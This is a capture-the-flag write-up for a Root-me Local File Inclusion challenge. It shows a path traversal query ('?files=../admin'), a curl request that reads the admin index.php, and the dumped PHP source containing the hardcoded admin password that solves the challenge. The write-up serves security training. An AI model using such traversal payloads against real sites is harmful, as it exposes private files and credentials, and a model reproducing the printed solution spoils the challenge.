Root-me

Local File Inclusion

Abbreviated LFI

Our goal is to get to the admin section.

When we get to the challenge page, we’re greeted by a “File viewer”. There’s a few categories with files inside. If we browse to one and look at the url we can start playing around with the url.

http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm

We need to get to the admin section, we know that the url for the admin section is http://challenge01.root-me.org/web-serveur/ch16/admin/

So we could try backup a folder.

http://challenge01.root-me.org/web-serveur/ch16/?files=../admin

There’s a file inside, an index.php

curl http://challenge01.root-me.org/web-serveur/ch16/?files=../admin&f=index.php

	  <h1>File viewer v 0.01</h1><span id="mnenu"/>&nbsp;|&nbsp;<span>
      <a href="?files=sysadm">sysadm</a></span>&nbsp;|&nbsp;<span>
      <a href="?files=reseau">reseau</a></span>&nbsp;|&nbsp;<span>
      <a href="?files=esprit">esprit</a></span>&nbsp;|&nbsp;<span>
      <a href="?files=crypto">crypto</a></span>&nbsp;|&nbsp;<span>
      <a href="?files=coding">coding</a></span>&nbsp;|&nbsp;<span>
      <a href="?files=archives">archives</a></span>&nbsp;|
      <span style='text-align: right; float:right;'>Connected as : <b>guest</b>&nbsp;|&nbsp;
      <a href="admin/">admin</a></span><br/><hr/><table id="content"><tr><td style="vertical-align: top;">
      <a href="?files=../admin&f=index.php" ><img width="32px" height="32px" src="text.gif" alt="index.php">index.php</a><br/></td>
      <td style="vertical-align: top;"></td></tr></table></body></html>
      
<pre>&lt;?php

function http_digest_parse($txt)
{
    $needed_parts = array('nonce'=&gt;1, 'nc'=&gt;1, 'cnonce'=&gt;1, 'qop'=&gt;1, 'username'=&gt;1, 'uri'=&gt;1, 'response'=&gt;1);
    $data = array();
    $keys = implode('|', array_keys($needed_parts));
 
    preg_match_all('@(' . $keys . ')=(?:([\'&quot;])([^\2]+?)\2|([^\s,]+))@', $txt, $matches, PREG_SET_ORDER);

    foreach ($matches as $m) {
        $data[$m[1]] = $m[3] ? $m[3] : $m[4];
        unset($needed_parts[$m[1]]);
    }

    return $needed_parts ? false : $data;
}


function auth($realm){
    header('HTTP/1.1 401 Unauthorized');
    header('WWW-Authenticate: Digest realm=&quot;'.$realm.'&quot;,qop=&quot;auth&quot;,nonce=&quot;'.uniqid().'&quot;,opaque=&quot;'.md5($realm).'&quot;');
    die($realm);
}


$realm = 'PHP Restricted area';
$users = array('admin' =&gt; 'OpbNJ60xYpvAQU8');


if (empty($_SERVER['PHP_AUTH_DIGEST'])) {
  auth($realm);
}

if (!($data = http_digest_parse($_SERVER['PHP_AUTH_DIGEST'])) || !isset($users[$data['username']]))
    auth($realm);


$A1 = md5($data['username'] . ':' . $realm . ':' . $users[$data['username']]);
$A2 = md5($_SERVER['REQUEST_METHOD'].':'.$data['uri']);
$valid_response = md5($A1.':'.$data['nonce'].':'.$data['nc'].':'.$data['cnonce'].':'.$data['qop'].':'.$A2);

if ($data['response'] != $valid_response)
    auth($realm);

echo &quot;&lt;html&gt;
	&lt;head&gt;&lt;/head&gt;
	&lt;body&gt;
	    &lt;h3&gt;You could use this password to validate the challenge !&lt;/h3&gt;
	&lt;/body&gt;
      &lt;/html&gt;&quot;;

?&gt;</pre><hr/></td></tr></table></body></html>

We got the password in the file: OpbNJ60xYpvAQU8